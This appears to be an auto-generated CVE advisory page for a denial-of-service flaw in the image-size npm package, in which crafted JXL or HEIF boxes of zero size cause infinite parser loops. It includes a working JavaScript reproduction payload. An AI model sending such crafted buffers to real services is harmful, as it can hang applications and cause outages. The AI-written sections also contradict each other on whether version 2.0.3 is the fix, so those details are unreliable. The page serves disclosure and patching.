CVE-2025-71329
Description
image-size versions up to 2.0.2 are vulnerable to a DoS attack via crafted image buffers that cause infinite loops in JXL or HEIF parsers.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
image-size versions up to 2.0.2 are vulnerable to a DoS attack via crafted image buffers that cause infinite loops in JXL or HEIF parsers.
Vulnerability
The image-size package, specifically versions up to and including 2.0.2, contains a denial-of-service vulnerability. This flaw allows remote attackers to cause an infinite loop by providing a specially crafted image buffer. The vulnerability is triggered when a recognized box-type within the image data has a zero-valued size field, preventing the offset from advancing in the JXL or HEIF image parsers [1], [3].
Exploitation
An attacker can exploit this vulnerability by sending a specially crafted image file to an application that uses the image-size package for parsing. The crafted image must contain a box with a size of zero within its JXL or HEIF data. This causes the parsing loop to never terminate, as the offset does not advance, leading to a denial of service [1], [3]. No authentication or user interaction is required.
Impact
Successful exploitation of this vulnerability results in a denial of service. The infinite loop consumes resources and permanently blocks the Node.js event loop, rendering the affected application unresponsive. This can lead to a complete outage of the service provided by the application [3].
Mitigation
This vulnerability has been fixed in image-size version 2.0.3. Users are advised to update to version 2.0.3 or later. No workarounds are available if unable to update. The vulnerability was patched in a pull request merged on February 23, 2026 [2].
AI Insight generated on Jun 10, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected products
1- Range: <=2.0.2
Patches
0No patches discovered yet.
Vulnerability mechanics
Root cause
"The image-size library enters an infinite loop when parsing certain image formats with a crafted zero-sized box."
Attack vector
Remote attackers can trigger a denial of service by supplying a specially crafted image buffer containing a box with a zero-valued size field. This crafted input causes an infinite loop in the JXL or HEIF image parsers, preventing the offset from advancing and hanging the application [ref_id=1]. The vulnerability affects versions up to and including 2.0.2 [ref_id=1].
Affected code
The vulnerability exists within the JXL and HEIF image parsing code paths. Specifically, the `findBox` function, when used in the JXL parsing logic, can encounter a zero-sized box. This leads to an infinite loop in the `extractPartialStreams` function because the offset does not advance [ref_id=1]. A similar issue is present in the HEIF parsing code and the ICNS code path.
What the fix does
The patch is not explicitly provided in the bundle. However, the advisory indicates that the vulnerability is fixed in later versions. The recommended remediation is to update the image-size library to a version that addresses this issue. The advisory does not specify the exact version where the fix was introduced [ref_id=1].
Preconditions
- inputA specially crafted image buffer with a zero-valued size field in a recognized box-type.
Reproduction
```javascript // mkdir 2.0.2 // cd 2.0.2/ // npm i image-size@2.0.2 const {imageSize} = require("image-size");
const PAYLOAD = new Uint8Array([ // ftyp (size=16) 0x00,0x00,0x00,0x10, 0x66,0x74,0x79,0x70, 0x61,0x76,0x69,0x66, 0x00,0x00,0x00,0x00, // meta (size=36) 0x00,0x00,0x00,0x24, 0x6D,0x65,0x74, 0x61,0x00,0x00,0x00,0x00, // iprp (size=8) 0x00,0x00,0x00,0x08, 0x69,0x70,0x72, 0x70, // ipco (size=20) 0x00,0x00,0x00,0x14, 0x69,0x70, 0x63,0x6F, // ispe (size=0) + padding (16 bytes) 0x00,0x00,0x00,0x00, 0x69,0x73, 0x70,0x65, 0x00,0x00,0x00,0x00, 0x00,0x00, 0x00,0x00, 0x00,0x00,0x00,0x00, 0x00,0x00, 0x00,0x00, ]);
imageSize(PAYLOAD) ``` [ref_id=1]
Generated on Jun 10, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
References
3News mentions
0No linked articles in our index yet.